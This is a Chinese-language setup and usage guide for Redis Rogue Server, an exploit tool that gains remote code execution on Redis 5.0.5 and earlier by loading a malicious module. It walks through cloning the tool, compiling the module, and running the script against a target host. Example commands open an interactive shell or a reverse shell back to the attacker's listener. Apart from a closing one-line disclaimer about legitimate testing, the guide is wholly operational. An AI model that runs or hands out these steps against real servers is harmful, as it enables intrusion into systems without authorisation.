Redis Rogue Server 安装和配置指南

1. 项目基础介绍和主要的编程语言

项目基础介绍

Redis Rogue Server 是一个用于 Redis 远程代码执行（RCE）的漏洞利用工具。它支持 Redis 版本 5.0.5 及以下，允许攻击者通过该工具获取目标 Redis 服务器的交互式 shell 或反向 shell。

主要的编程语言

该项目主要使用 Python 编写，同时也包含一些 C 和 C++ 代码用于编译 Redis 模块。

2. 项目使用的关键技术和框架

关键技术

• Redis 模块加载：利用 Redis 的模块加载功能执行恶意代码。
• 交互式 shell 和反向 shell：支持与目标 Redis 服务器的交互式 shell 和反向 shell 连接。

框架

• Python 3.6+：用于编写主要的漏洞利用脚本。
• Makefile：用于编译 Redis 模块。

3. 项目安装和配置的准备工作和详细的安装步骤

准备工作

1. 操作系统：建议在 Linux 或 macOS 系统上进行安装和配置。
2. Python 3.6+：确保系统中已安装 Python 3.6 或更高版本。
3. Git：用于克隆项目代码。
4. Make：用于编译 Redis 模块（可选，如果需要修改或重新编译模块）。

安装步骤

步骤 1：克隆项目代码

首先，使用 Git 克隆项目代码到本地：

git clone https://github.com/n0b0dyCN/redis-rogue-server.git

步骤 2：进入项目目录

进入克隆下来的项目目录：

cd redis-rogue-server

步骤 3：编译 Redis 模块（可选）

如果你需要修改或重新编译 Redis 模块，可以使用以下命令：

cd RedisModulesSDK/exp/
make

编译完成后，将生成的 .so 文件复制到 redis-rogue-server.py 所在的目录。

步骤 4：运行漏洞利用脚本

使用以下命令运行漏洞利用脚本：

python3 redis-rogue-server.py --rhost <目标Redis服务IP> --rport <目标Redis服务端口> --lhost <本地IP> --lport <本地监听端口>

例如：

python3 redis-rogue-server.py --rhost 192.168.1.100 --rport 6379 --lhost 192.168.1.2 --lport 21000

参数说明

• --rhost：目标 Redis 服务的 IP 地址。
• --rport：目标 Redis 服务的端口，默认为 6379。
• --lhost：本地 IP 地址，用于监听反向 shell 连接。
• --lport：本地监听端口，默认为 21000。

使用示例

1. 交互式 shell：

python3 redis-rogue-server.py --rhost 192.168.1.100 --lhost 192.168.1.2

2. 反向 shell：

python3 redis-rogue-server.py --rhost 192.168.1.100 --lhost 192.168.1.2 --lport 9999

总结

通过以上步骤，你可以成功安装和配置 Redis Rogue Server，并利用它对目标 Redis 服务器进行漏洞利用。请注意，该工具仅用于合法的安全测试和研究目的。